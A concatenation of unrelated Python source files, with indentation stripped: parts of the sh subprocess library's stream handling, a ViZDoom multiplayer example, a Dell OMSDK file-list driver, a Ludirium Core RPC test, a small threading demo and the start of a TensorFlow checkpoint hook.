""" this function is run in a separate thread. it reads from the
process's stdout stream (a streamreader), and waits for it to claim that
its done """
readers = []
errors = []
if stdout is not None:
readers.append(stdout)
errors.append(stdout)
if stderr is not None:
readers.append(stderr)
errors.append(stderr)
# this is our select loop for polling stdout or stderr that is ready to
# be read and processed. if one of those streamreaders indicate that it
# is done altogether being read from, we remove it from our list of
# things to poll. when no more things are left to poll, we leave this
# loop and clean up
while readers:
outputs, inputs, err = select.select(readers, [], errors, 0.1)
# stdout and stderr
for stream in outputs:
self.log.debug("%r ready to be read from", stream)
done = stream.read()
if done:
readers.remove(stream)
for stream in err:
pass
# test if the process has been running too long
if timeout:
now = time.time()
if now - started > timeout:
self.log.debug("we've been running too long")
self.timed_out = True
self.signal(timeout_exc)
# this is here because stdout may be the controlling TTY, and
# we can't close it until the process has ended, otherwise the
# child will get SIGHUP. typically, if we've broken out of
# the above loop, and we're here, the process is just about to
# end, so it's probably ok to aggressively poll self.is_alive()
#
# the other option to this would be to do the CTTY close from
# the method that does the actual os.waitpid() call, but the
# problem with that is that the above loop might still be
# running, and closing the fd will cause some operation to
# fail. this is less complex than wrapping all the ops
# in the above loop with out-of-band fd-close exceptions
while self.is_alive():
time.sleep(0.001)
if stdout:
stdout.close()
if stderr:
stderr.close()
@property
def stdout(self):
return "".encode(self.call_args["encoding"]).join(self._stdout)
@property
def stderr(self):
return "".encode(self.call_args["encoding"]).join(self._stderr)
def signal(self, sig):
self.log.debug("sending signal %d", sig)
try:
os.kill(self.pid, sig)
except OSError:
pass
def kill(self):
self.log.debug("killing")
self.signal(signal.SIGKILL)
def terminate(self):
self.log.debug("terminating")
self.signal(signal.SIGTERM)
def is_alive(self):
""" polls if our child process has completed, without blocking. this
method has side-effects, such as setting our exit_code, if we happen to
see our child exit while this is running """
if self.exit_code is not None:
return False
# what we're doing here essentially is making sure that the main thread
# (or another thread), isn't calling .wait() on the process. because
# .wait() calls os.waitpid(self.pid, 0), we can't do an os.waitpid
# here...because if we did, and the process exited while in this
# thread, the main thread's os.waitpid(self.pid, 0) would raise OSError
# (because the process ended in another thread).
#
# so essentially what we're doing is, using this lock, checking if
# we're calling .wait(), and if we are, let .wait() get the exit code
# and handle the status, otherwise let us do it.
acquired = self._wait_lock.acquire(False)
if not acquired:
if self.exit_code is not None:
return False
return True
try:
# WNOHANG is just that...we're calling waitpid without hanging...
# essentially polling the process. the return result is (0, 0) if
# there's no process status, so we check that pid == self.pid below
# in order to determine how to proceed
pid, exit_code = os.waitpid(self.pid, os.WNOHANG)
if pid == self.pid:
self.exit_code = handle_process_exit_code(exit_code)
return False
# no child process
except OSError:
return False
else:
return True
finally:
self._wait_lock.release()
def wait(self):
""" waits for the process to complete, handles the exit code """
self.log.debug("acquiring wait lock to wait for completion")
# using the lock in a with-context blocks, which is what we want if
# we're running wait()
with self._wait_lock:
self.log.debug("got wait lock")
if self.exit_code is None:
self.log.debug("exit code not set, waiting on pid")
pid, exit_code = os.waitpid(self.pid, 0) # blocks
self.exit_code = handle_process_exit_code(exit_code)
else:
self.log.debug("exit code already set (%d), no need to wait", self.exit_code)
# we may not have a thread for stdin, if the pipe has been connected
# via _piped="direct"
if self._input_thread:
self._input_thread.join()
# wait for our stdout and stderr streamreaders to finish reading and
# aggregating the process output
self._output_thread.join()
return self.exit_code
class DoneReadingForever(Exception): pass
class NotYetReadyToRead(Exception): pass
def determine_how_to_read_input(input_obj):
""" given some kind of input object, return a function that knows how to
read chunks of that input object.
each reader function should return a chunk and raise a DoneReadingForever
exception, or return None, when there's no more data to read
NOTE: the function returned does not need to care much about the requested
buffering type (eg, unbuffered vs newline-buffered). the StreamBufferer
will take care of that. these functions just need to return a
reasonably-sized chunk of data. """
get_chunk = None
if isinstance(input_obj, Queue):
log_msg = "queue"
get_chunk = get_queue_chunk_reader(input_obj)
elif callable(input_obj):
log_msg = "callable"
get_chunk = get_callable_chunk_reader(input_obj)
# also handles stringio
elif hasattr(input_obj, "read"):
log_msg = "file descriptor"
get_chunk = get_file_chunk_reader(input_obj)
elif isinstance(input_obj, basestring):
log_msg = "string"
get_chunk = get_iter_string_reader(input_obj)
else:
log_msg = "general iterable"
get_chunk = get_iter_chunk_reader(iter(input_obj))
return get_chunk, log_msg
def get_queue_chunk_reader(stdin):
def fn():
try:
chunk = stdin.get(True, 0.01)
except Empty:
raise NotYetReadyToRead
if chunk is None:
raise DoneReadingForever
return chunk
return fn
def get_callable_chunk_reader(stdin):
def fn():
try:
return stdin()
except:
raise DoneReadingForever
return fn
def get_iter_string_reader(stdin):
""" return an iterator that returns a chunk of a string every time it is
called. notice that even though bufsize_type might be line buffered, we're
not doing any line buffering here. that's because our StreamBufferer
handles all buffering. we just need to return a reasonable-sized chunk. """
bufsize = 1024
iter_str = (stdin[i:i + bufsize] for i in range(0, len(stdin), bufsize))
return get_iter_chunk_reader(iter_str)
def get_iter_chunk_reader(stdin):
def fn():
try:
if IS_PY3:
chunk = stdin.__next__()
else:
chunk = stdin.next()
return chunk
except StopIteration:
raise DoneReadingForever
return fn
def get_file_chunk_reader(stdin):
bufsize = 1024
def fn():
chunk = stdin.read(bufsize)
if not chunk:
raise DoneReadingForever
else:
return chunk
return fn
def bufsize_type_to_bufsize(bf_type):
""" for a given bufsize type, return the actual bufsize we will read.
notice that although 1 means "newline-buffered", we're reading a chunk size
of 1024. this is because we have to read something. we let a
StreamBufferer instance handle splitting our chunk on newlines """
# newlines
if bf_type == 1:
bufsize = 1024
# unbuffered
elif bf_type == 0:
bufsize = 1
# or buffered by specific amount
else:
bufsize = bf_type
return bufsize
class StreamWriter(object):
""" StreamWriter reads from some input (the stdin param) and writes to a fd
(the stream param). the stdin may be a Queue, a callable, something with
the "read" method, a string, or an iterable """
def __init__(self, log, stream, stdin, bufsize_type, encoding, tty_in):
self.stream = stream
self.stdin = stdin
self.log = log
self.encoding = encoding
self.tty_in = tty_in
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding)
self.get_chunk, log_msg = determine_how_to_read_input(stdin)
self.log.debug("parsed stdin as a %s", log_msg)
def fileno(self):
""" defining this allows us to do select.select on an instance of this
class """
return self.stream
def write(self):
""" attempt to get a chunk of data to write to our child process's
stdin, then write it. the return value answers the questions "are we
done writing forever?" """
# get_chunk may sometimes return bytes, and sometimes returns trings
# because of the nature of the different types of STDIN objects we
# support
try:
chunk = self.get_chunk()
if chunk is None:
raise DoneReadingForever
except DoneReadingForever:
self.log.debug("done reading")
if self.tty_in:
# EOF time
try:
char = termios.tcgetattr(self.stream)[6][termios.VEOF]
except:
char = chr(4).encode()
os.write(self.stream, char)
return True
except NotYetReadyToRead:
self.log.debug("received no data")
return False
# if we're not bytes, make us bytes
if IS_PY3 and hasattr(chunk, "encode"):
chunk = chunk.encode(self.encoding)
for proc_chunk in self.stream_bufferer.process(chunk):
self.log.debug("got chunk size %d: %r", len(proc_chunk),
proc_chunk[:30])
self.log.debug("writing chunk to process")
try:
os.write(self.stream, proc_chunk)
except OSError:
self.log.debug("OSError writing stdin chunk")
return True
def close(self):
self.log.debug("closing, but flushing first")
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
try:
if chunk:
os.write(self.stream, chunk)
if not self.tty_in:
self.log.debug("we used a TTY, so closing the stream")
os.close(self.stream)
except OSError:
pass
def determine_how_to_feed_output(handler, encoding, decode_errors):
if callable(handler):
process, finish = get_callback_chunk_consumer(handler, encoding,
decode_errors)
elif isinstance(handler, cStringIO):
process, finish = get_cstringio_chunk_consumer(handler)
elif isinstance(handler, StringIO):
process, finish = get_stringio_chunk_consumer(handler, encoding,
decode_errors)
elif hasattr(handler, "write"):
process, finish = get_file_chunk_consumer(handler)
else:
process = lambda chunk: False
finish = lambda: None
return process, finish
def get_file_chunk_consumer(handler):
def process(chunk):
handler.write(chunk)
# we should flush on an fd. chunk is already the correctly-buffered
# size, so we don't need the fd buffering as well
handler.flush()
return False
def finish():
if hasattr(handler, "flush"):
handler.flush()
return process, finish
def get_callback_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
# try to use the encoding first, if that doesn't work, send
# the bytes, because it might be binary
try:
chunk = chunk.decode(encoding, decode_errors)
except UnicodeDecodeError:
pass
return handler(chunk)
def finish():
pass
return process, finish
def get_cstringio_chunk_consumer(handler):
def process(chunk):
handler.write(chunk)
return False
def finish():
pass
return process, finish
def get_stringio_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
handler.write(chunk.decode(encoding, decode_errors))
return False
def finish():
pass
return process, finish
class StreamReader(object):
""" reads from some output (the stream) and sends what it just read to the
handler. """
def __init__(self, log, stream, handler, buffer, bufsize_type, encoding,
decode_errors, pipe_queue=None, save_data=True):
self.stream = stream
self.buffer = buffer
self.save_data = save_data
self.encoding = encoding
self.decode_errors = decode_errors
self.pipe_queue = None
if pipe_queue:
self.pipe_queue = weakref.ref(pipe_queue)
self.log = log
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding,
self.decode_errors)
self.bufsize = bufsize_type_to_bufsize(bufsize_type)
self.process_chunk, self.finish_chunk_processor = \
determine_how_to_feed_output(handler, encoding, decode_errors)
self.should_quit = False
def fileno(self):
""" defining this allows us to do select.select on an instance of this
class """
return self.stream
def close(self):
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
if chunk:
self.write_chunk(chunk)
self.finish_chunk_processor()
if self.pipe_queue and self.save_data:
self.pipe_queue().put(None)
try:
os.close(self.stream)
except OSError:
pass
def write_chunk(self, chunk):
# in PY3, the chunk coming in will be bytes, so keep that in mind
if not self.should_quit:
self.should_quit = self.process_chunk(chunk)
if self.save_data:
self.buffer.append(chunk)
if self.pipe_queue:
self.log.debug("putting chunk onto pipe: %r", chunk[:30])
self.pipe_queue().put(chunk)
def read(self):
# if we're PY3, we're reading bytes, otherwise we're reading
# str
try:
chunk = os.read(self.stream, self.bufsize)
except OSError as e:
self.log.debug("got errno %d, done reading", e.errno)
return True
if not chunk:
self.log.debug("got no chunk, done reading")
return True
self.log.debug("got chunk size %d: %r", len(chunk), chunk[:30])
for chunk in self.stream_bufferer.process(chunk):
self.write_chunk(chunk)
class StreamBufferer(object):
""" this is used for feeding in chunks of stdout/stderr, and breaking it up
into chunks that will actually be put into the internal buffers. for
example, if you have two processes, one being piped to the other, and you
want that, first process to feed lines of data (instead of the chunks
however they come in), OProc will use an instance of this class to chop up
the data and feed it as lines to be sent down the pipe """
def __init__(self, buffer_type, encoding=DEFAULT_ENCODING,
decode_errors="strict"):
# 0 for unbuffered, 1 for line, everything else for that amount
self.type = buffer_type
self.buffer = []
self.n_buffer_count = 0
self.encoding = encoding
self.decode_errors = decode_errors
# this is for if we change buffering types. if we change from line
# buffered to unbuffered, its very possible that our self.buffer list
# has data that was being saved up (while we searched for a newline).
# we need to use that up, so we don't lose it
self._use_up_buffer_first = False
# the buffering lock is used because we might chance the buffering
# types from a different thread. for example, if we have a stdout
# callback, we might use it to change the way stdin buffers. so we
# lock
self._buffering_lock = threading.RLock()
self.log = Logger("stream_bufferer")
def change_buffering(self, new_type):
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock for changing buffering")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for changing buffering")
try:
if new_type == 0:
self._use_up_buffer_first = True
self.type = new_type
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for changing buffering")
def process(self, chunk):
# MAKE SURE THAT THE INPUT IS PY3 BYTES
# THE OUTPUT IS ALWAYS PY3 BYTES
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock to process chunk (buffering: %d)", self.type)
self._buffering_lock.acquire()
self.log.debug("got buffering lock to process chunk (buffering: %d)", self.type)
try:
# we've encountered binary, permanently switch to N size buffering
# since matching on newline doesn't make sense anymore
if self.type == 1:
try:
chunk.decode(self.encoding, self.decode_errors)
except:
self.log.debug("detected binary data, changing buffering")
self.change_buffering(1024)
# unbuffered
if self.type == 0:
if self._use_up_buffer_first:
self._use_up_buffer_first = False
to_write = self.buffer
self.buffer = []
to_write.append(chunk)
return to_write
return [chunk]
# line buffered
# we must decode the bytes before we try to match on newline
elif self.type == 1:
total_to_write = []
chunk = chunk.decode(self.encoding, self.decode_errors)
while True:
newline = chunk.find("\n")
if newline == -1:
break
chunk_to_write = chunk[:newline + 1]
if self.buffer:
# this is ugly, but it's designed to take the existing
# bytes buffer, join it together, tack on our latest
# chunk, then convert the whole thing to a string.
# it's necessary, i'm sure. read the whole block to
# see why.
chunk_to_write = "".encode(self.encoding).join(self.buffer) \
+ chunk_to_write.encode(self.encoding)
chunk_to_write = chunk_to_write.decode(self.encoding)
self.buffer = []
self.n_buffer_count = 0
chunk = chunk[newline + 1:]
total_to_write.append(chunk_to_write.encode(self.encoding))
if chunk:
self.buffer.append(chunk.encode(self.encoding))
self.n_buffer_count += len(chunk)
return total_to_write
# N size buffered
else:
total_to_write = []
while True:
overage = self.n_buffer_count + len(chunk) - self.type
if overage >= 0:
ret = "".encode(self.encoding).join(self.buffer) + chunk
chunk_to_write = ret[:self.type]
chunk = ret[self.type:]
total_to_write.append(chunk_to_write)
self.buffer = []
self.n_buffer_count = 0
else:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
break
return total_to_write
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for processing chunk (buffering: %d)", self.type)
def flush(self):
self.log.debug("acquiring buffering lock for flushing buffer")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for flushing buffer")
try:
ret = "".encode(self.encoding).join(self.buffer)
self.buffer = []
return ret
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for flushing buffer")
@contextmanager
def pushd(path):
""" pushd is just a specialized form of args, where we're passing in the
current working directory """
with args(_cwd=path):
yield
@contextmanager
def args(*args, **kwargs):
""" allows us to temporarily override all the special keyword parameters in
a with context """
call_args = Command._call_args
old_args = call_args.copy()
for key,value in kwargs.items():
key = key.lstrip("_")
call_args[key] = value
yield
call_args.update(old_args)
class Environment(dict):
""" this allows lookups to names that aren't found in the global scope to be
searched for as a program name. for example, if "ls" isn't found in this
module's scope, we consider it a system program and try to find it.
we use a dict instead of just a regular object as the base class because the
exec() statement used in this file requires the "globals" argument to be a
dictionary """
# this is a list of all of the names that the sh module exports that will
# not resolve to functions. we don't want to accidentally shadow real
# commands with functions/imports that we define in sh.py. for example,
# "import time" may override the time system program
whitelist = set([
"Command",
"CommandNotFound",
"DEFAULT_ENCODING",
"DoneReadingForever",
"ErrorReturnCode",
"NotYetReadyToRead",
"SignalException",
"TimeoutException",
"__project_url__",
"__version__",
"args",
"glob",
"pushd",
])
def __init__(self, globs, baked_args={}):
self.globs = globs
self.baked_args = baked_args
self.disable_whitelist = False
def __setitem__(self, k, v):
self.globs[k] = v
def __getitem__(self, k):
# if we first import "_disable_whitelist" from sh, we can import
# anything defined in the global scope of sh.py. this is useful for our
# tests
if k == "_disable_whitelist":
self.disable_whitelist = True
return None
# we're trying to import something real (maybe), see if it's in our
# global scope
if k in self.whitelist or self.disable_whitelist:
try:
return self.globs[k]
except KeyError:
pass
# somebody tried to be funny and do "from sh import *"
if k == "__all__":
raise AttributeError("Cannot import * from sh. \
Please import sh or import programs individually.")
# check if we're naming a dynamically generated ReturnCode exception
exc = get_exc_from_name(k)
if exc:
return exc
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
if k.startswith("__") and k.endswith("__"):
raise AttributeError
# how about an environment variable?
try:
return os.environ[k]
except KeyError:
pass
# is it a custom builtin?
builtin = getattr(self, "b_" + k, None)
if builtin:
return builtin
# it must be a command then
# we use _create instead of instantiating the class directly because
# _create uses resolve_program, which will automatically do underscore-
# to-dash conversions. instantiating directly does not use that
return Command._create(k, **self.baked_args)
# methods that begin with "b_" are custom builtins and will override any
# program that exists in our path. this is useful for things like
# common shell builtins that people are used to, but which aren't actually
# full-fledged system binaries
def b_cd(self, path):
os.chdir(path)
def b_which(self, program):
return which(program)
def run_repl(env): # pragma: no cover
banner = "\n>> sh v{version}\n>> https://github.com/amoffat/sh\n"
print(banner.format(version=__version__))
while True:
try:
line = raw_input("sh> ")
except (ValueError, EOFError):
break
try:
exec(compile(line, "<dummy>", "single"), env, env)
except SystemExit:
break
except:
print(traceback.format_exc())
# cleans up our last line
print("")
# this is a thin wrapper around THIS module (we patch sys.modules[__name__]).
# this is in the case that the user does a "from sh import whatever"
# in other words, they only want to import certain programs, not the whole
# system PATH worth of commands. in this case, we just proxy the
# import lookup to our Environment class
class SelfWrapper(ModuleType):
def __init__(self, self_module, baked_args={}):
# this is super ugly to have to copy attributes like this,
# but it seems to be the only way to make reload() behave
# nicely. if i make these attributes dynamic lookups in
# __getattr__, reload sometimes chokes in weird ways...
for attr in ["__builtins__", "__doc__", "__name__", "__package__"]:
setattr(self, attr, getattr(self_module, attr, None))
# python 3.2 (2.7 and 3.3 work fine) breaks on osx (not ubuntu)
# if we set this to None. and 3.3 needs a value for __path__
self.__path__ = []
self.__self_module = self_module
self.__env = Environment(globals(), baked_args)
def __setattr__(self, name, value):
if hasattr(self, "__env"):
self.__env[name] = value
else:
ModuleType.__setattr__(self, name, value)
def __getattr__(self, name):
if name == "__env":
raise AttributeError
return self.__env[name]
# accept special keywords argument to define defaults for all operations
# that will be processed with given by return SelfWrapper
def __call__(self, **kwargs):
return SelfWrapper(self.__self_module, kwargs)
# we're being run as a stand-alone script
if __name__ == "__main__": # pragma: no cover
try:
arg = sys.argv.pop(1)
except:
arg = None
if arg == "test":
import subprocess
def run_test(version, locale):
py_version = "python%s" % version
py_bin = which(py_version)
if py_bin:
print("Testing %s, locale %r" % (py_version.capitalize(),
locale))
env = os.environ.copy()
env["LANG"] = locale
p = subprocess.Popen([py_bin, os.path.join(THIS_DIR, "test.py")]
+ sys.argv[1:], env=env)
return_code = p.wait()
if return_code != 0:
exit(1)
else:
print("Couldn't find %s, skipping" % py_version.capitalize())
versions = ("2.6", "2.7", "3.1", "3.2", "3.3", "3.4")
locales = ("en_US.UTF-8", "C")
for locale in locales:
for version in versions:
run_test(version, locale)
else:
env = Environment(globals())
run_repl(env)
# we're being imported from somewhere
else:
self = sys.modules[__name__]
sys.modules[__name__] = SelfWrapper(self)
|
multiple_instances_advance.py
|
#!/usr/bin/env python3
import os
from random import choice, random
from time import sleep, time
import vizdoom as vzd
# For multiplayer game use process (ZDoom's multiplayer sync mechanism prevents threads to work as expected).
from multiprocessing import cpu_count, Process
# For singleplayer games threads can also be used.
# from threading import Thread
# Config
episodes = 1
timelimit = 1 # minutes
players = 8 # number of players
skip = 4
mode = vzd.Mode.PLAYER # or Mode.ASYNC_PLAYER
ticrate = 2 * vzd.DEFAULT_TICRATE # for Mode.ASYNC_PLAYER
random_sleep = True
const_sleep_time = 0.005
window = True
resolution = vzd.ScreenResolution.RES_320X240
args =""
console = False
config = os.path.join(vzd.scenarios_path, "cig.cfg")
def setup_player():
game = vzd.DoomGame()
game.load_config(config)
game.set_mode(mode)
game.add_game_args(args)
game.set_screen_resolution(resolution)
game.set_console_enabled(console)
game.set_window_visible(window)
game.set_ticrate(ticrate)
actions = [[1,0,0,0,0,0,0,0,0],[0,1,0,0,0,0,0,0,0],[0,0,1,0,0,0,0,0,0]]
return game, actions
def player_action(game, player_sleep_time, actions, player_skip):
if random_sleep:
sleep(random() * 0.005 + 0.001)
elif player_sleep_time > 0:
sleep(player_sleep_time)
game.make_action(choice(actions), player_skip)
if game.is_player_dead():
game.respawn_player()
def player_host(p):
game, actions = setup_player()
game.add_game_args("-host " + str(p) + " -netmode 0 -deathmatch +timelimit " + str(timelimit) +
" +sv_spawnfarthest 1 +name Player0 +colorset 0")
game.add_game_args(args)
game.init()
action_count = 0
player_sleep_time = const_sleep_time
player_skip = skip
for i in range(episodes):
print("Episode #" + str(i + 1))
episode_start_time = None
while not game.is_episode_finished():
if episode_start_time is None:
episode_start_time = time()
state = game.get_state()
print("Player0:", state.number, action_count, game.get_episode_time())
player_action(game, player_sleep_time, actions, player_skip)
action_count += 1
print("Player0 frags:", game.get_game_variable(vzd.GameVariable.FRAGCOUNT))
print("Host: Episode finished!")
player_count = int(game.get_game_variable(vzd.GameVariable.PLAYER_COUNT))
for i in range(1, player_count + 1):
print("Host: Player" + str(i) + ":", game.get_game_variable(eval("vzd.GameVariable.PLAYER" + str(i) + "_FRAGCOUNT")))
print("Host: Episode processing time:", time() - episode_start_time)
# Starts a new episode. All players have to call new_episode() in multiplayer mode.
game.new_episode()
game.close()
def player_join(p):
game, actions = setup_player()
game.add_game_args("-join 127.0.0.1 +name Player" + str(p) + " +colorset " + str(p))
game.add_game_args(args)
game.init()
action_count = 0
player_sleep_time = const_sleep_time
player_skip = skip
for i in range(episodes):
while not game.is_episode_finished():
state = game.get_state()
print("Player" + str(p) + ":", state.number, action_count, game.get_episode_time())
player_action(game, player_sleep_time, actions, player_skip)
action_count += 1
print("Player" + str(p) + " frags:", game.get_game_variable(vzd.GameVariable.FRAGCOUNT))
game.new_episode()
game.close()
if __name__ == '__main__':
print("Players:", players)
print("CPUS:", cpu_count())
processes = []
for i in range(1, players):
p_join = Process(target=player_join, args=(i,))
p_join.start()
processes.append(p_join)
player_host(players)
print("Done")
|
FileList.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Copyright © 2018 Dell Inc. or its subsidiaries. All rights reserved.
# Dell, EMC, and other trademarks are trademarks of Dell Inc. or its subsidiaries.
# Other trademarks may be trademarks of their respective owners.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors: Vaideeswaran Ganesan
#
import os
import io
import logging
import threading
import time
from omsdk.sdkconsole import iConsoleRegistry, iConsoleDriver, iConsoleDiscovery
from omsdk.sdkprint import PrettyPrint
from omsdk.sdkproto import PCONSOLE
import sys
import logging
logger = logging.getLogger(__name__)
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
# logging.basicConfig(level=logging.DEBUG,
# format='[%(levelname)s] (%(threadName)-10s) %(message)s',)
class FileList(iConsoleDiscovery):
def __init__(self, srcdir):
if PY2:
super(FileList, self).__init__(iConsoleRegistry("FileList", srcdir, None))
else:
super().__init__(iConsoleRegistry("FileList", srcdir, None))
self.protofactory.add(PCONSOLE(obj=self))
def my_entitytype(self, pinfra, listfile, creds, protofactory):
return FileListEntity(self.ref, pinfra, protofactory, listfile, creds)
class FileListEntity(iConsoleDriver):
def __init__(self, ref, pinfra, protofactory, listfile, creds):
if PY2:
super(FileListEntity, self).__init__(ref, protofactory, listfile, creds)
else:
super().__init__(ref, protofactory, listfile, creds)
self.listfile = listfile
self.maplist = {}
self.myentitylistlock = threading.Lock()
self.pinfra = pinfra
# SDK Infrastructure
self.entitylist = []
self.success = {}
self.failed = {}
def _worker(self, device):
logger.debug("Starting")
devEntity = self.pinfra.find_driver(device, self.creds, True)
with self.myentitylistlock:
if not devEntity is None:
self.entitylist.append(devEntity)
# if devEntity is None:
# logger.debug("None is " + device)
# else:
# devEntity.get_entityjson()
logger.debug("Exiting")
def process(self):
self.threadlist = []
with open(self.listfile, "r") as mylist:
for line in mylist:
device = line.rstrip()
thr = threading.Thread(name=device, \
target=self._worker, args=(device,))
self.threadlist.append(thr)
thr.start()
logger.debug('Waiting for _worker threads')
for t in self.threadlist:
t.join()
for hgroup in self.maplist:
tst = {}
tst["Name"] = hgroup
tst["ID"] = hgroup
tst["Description"] = hgroup
tst["Devices"] = self.maplist[hgroup]
tst["DevicesCount"] = len(self.maplist[hgroup])
self.entityjson["topology"]["DeviceGroups"][hgroup] = tst
return self
def printx(self):
with self.myentitylistlock:
for device in self.entityjson["devices"]["Devices"]:
logger.debug("-======" + str(device) + "----------")
if not device is None:
logger.debug(device.entityjson)
logger.debug("-==================-------")
def my_connect(self, pOptions):
status = False
try:
if os.path.isfile(self.listfile):
status = True
except:
status = False
logger.debug(self.ref.name + '::connect(' + self.listfile + ', ' + str(self.creds) + ")=" + str(status))
return status
def my_get_entityjson(self):
self.process()
return True
def _do_function(self, entity, function, *args):
logger.debug("Executing for " + entity.ipaddr + str(*args))
(retval, fname, msg) = function(entity, *args)
if retval:
with self.myentitylistlock:
self.success[function] = self.success[function] + 1
logger.debug("INFO: factory_config_export success! File=" + fname)
else:
with self.myentitylistlock:
self.failed[function] = self.failed[function] + 1
logger.debug(msg)
logger.debug("ERROR: factory_config_export failed with message: " + msg['Message'])
def runit(self, function, *arguments):
logger.debug("Running: " + str(function))
with self.myentitylistlock:
if function in self.success:
logger.debug("another runit with same funciton in progress!!")
# wait
self.success[function] = 0
self.failed[function] = 0
for entity in self.entitylist:
thr = threading.Thread(name=entity.ipaddr, \
target=self._do_function, \
args=(entity, function, arguments))
self.threadlist.append(thr)
thr.start()
for t in self.threadlist:
t.join()
retval = True
fname = "<none>"
status = 'Success'
with self.myentitylistlock:
if self.success[function] == 0:
retval = False
status = 'Failed'
msg = str(self.success[function]) + " succeeded. "
msg = msg + str(self.failed[function]) + " failed."
del self.success[function]
del self.failed[function]
return (retval, fname, {'Status': status, 'Message': msg})
def get_service_tag(self):
return "TEST-FileList"
|
interface_rpc.py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2020 The Ludirium Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Tests some generic aspects of the RPC interface."""
import os
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import LudiriumTestFramework
from test_framework.util import assert_equal, assert_greater_than_or_equal
from threading import Thread
import subprocess
def expect_http_status(expected_http_status, expected_rpc_code,
fcn, *args):
try:
fcn(*args)
raise AssertionError("Expected RPC error %d, got none" % expected_rpc_code)
except JSONRPCException as exc:
assert_equal(exc.error["code"], expected_rpc_code)
assert_equal(exc.http_status, expected_http_status)
def test_work_queue_getblock(node, got_exceeded_error):
while not got_exceeded_error:
try:
node.cli('getrpcinfo').send_cli()
except subprocess.CalledProcessError as e:
assert_equal(e.output, 'error: Server response: Work queue depth exceeded\n')
got_exceeded_error.append(True)
class RPCInterfaceTest(LudiriumTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.supports_cli = False
def test_getrpcinfo(self):
self.log.info("Testing getrpcinfo...")
info = self.nodes[0].getrpcinfo()
assert_equal(len(info['active_commands']), 1)
command = info['active_commands'][0]
assert_equal(command['method'], 'getrpcinfo')
assert_greater_than_or_equal(command['duration'], 0)
assert_equal(info['logpath'], os.path.join(self.nodes[0].datadir, self.chain, 'debug.log'))
def test_batch_request(self):
self.log.info("Testing basic JSON-RPC batch request...")
results = self.nodes[0].batch([
# A basic request that will work fine.
{"method": "getblockcount", "id": 1},
# Request that will fail. The whole batch request should still
# work fine.
{"method": "invalidmethod", "id": 2},
# Another call that should succeed.
{"method": "getblockhash", "id": 3, "params": [0]},
])
result_by_id = {}
for res in results:
result_by_id[res["id"]] = res
assert_equal(result_by_id[1]['error'], None)
assert_equal(result_by_id[1]['result'], 0)
assert_equal(result_by_id[2]['error']['code'], -32601)
assert_equal(result_by_id[2]['result'], None)
assert_equal(result_by_id[3]['error'], None)
assert result_by_id[3]['result'] is not None
def test_http_status_codes(self):
self.log.info("Testing HTTP status codes for JSON-RPC requests...")
expect_http_status(404, -32601, self.nodes[0].invalidmethod)
expect_http_status(500, -8, self.nodes[0].getblockhash, 42)
def test_work_queue_exceeded(self):
self.log.info("Testing work queue exceeded...")
self.restart_node(0, ['-rpcworkqueue=1', '-rpcthreads=1'])
got_exceeded_error = []
threads = []
for _ in range(3):
t = Thread(target=test_work_queue_getblock, args=(self.nodes[0], got_exceeded_error))
t.start()
threads.append(t)
for t in threads:
t.join()
def run_test(self):
self.test_getrpcinfo()
self.test_batch_request()
self.test_http_status_codes()
self.test_work_queue_exceeded()
if __name__ == '__main__':
RPCInterfaceTest().main()
|
Core.py
|
import threading
from multiprocessing import Queue
class Core:
def __init__(self):
self.threads = []
def add_process(self, function_called_object, process_priority, process_name, thread_name = None):
if not thread_name:
thread_name = function_called_object.__name__
process_object = {
'name': thread_name,
'priority' : process_priority,
'thread' : threading.Thread(target=function_called_object())
}
process_object['thread'].start()
self.threads.append(process_object)
def sort_by_prioity(self):
self.threads.sort()
def get_threads_names(self):
thread_names=[]
for i in self.threads:
thread_names.append(i['name'])
return thread_names
def func():
for i in range(10):
print(i)
def func2():
for i in range(10, 20):
print(i)
def func3(result):
result = 'lol'
obj = Core()
obj.add_process(function_called_object = func, process_priority = 1, process_name = 'test', thread_name='test name')
print(obj.threads)
obj.add_process(func2, process_priority = 3, process_name = 'test2')
obj.add_process(func2, process_priority = 2, process_name = 'test3')
print(obj.threads)
print(obj.get_threads_names())
|
async_checkpoint.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ======================================
"""Hook for asynchronous checkpointing.
This hook dispatches checkpoint writing operations in a separate thread to
allow execution to continue on the main thread.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
